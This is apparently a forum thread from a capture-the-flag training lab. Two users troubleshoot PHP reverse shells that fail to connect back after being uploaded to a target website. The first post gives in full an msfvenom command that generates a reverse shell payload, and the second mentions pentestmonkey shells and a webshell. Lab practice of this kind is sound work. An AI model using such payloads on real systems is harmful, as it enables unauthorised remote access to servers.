Hello all. I’m trying to get my reverse shell running but it seems like it won’t connect. I’m connected to the VPN and used the following command to generate it: msfvenom -p php/reverse_php LHOST=OUR_IP LPORT=OUR_PORT -f raw > reverse.php
Uploaded it over the website and opened it. It also seems like it tries to connect but I won’t receive the connection.
That the output I receive after it finished loading:
/*
I have the same experience, I am confused. The webshell worked and I got the flag immediately, and then I started doing reverse shell for reps, and I could not recieve the shell using the pentest monkey, I check the vpn, got a new connection file, yes I checked the firewall, yes I check the listener. The thing is I do this all the time with pentestmonkey etc. I get no reverse shells. I dont know what that is about.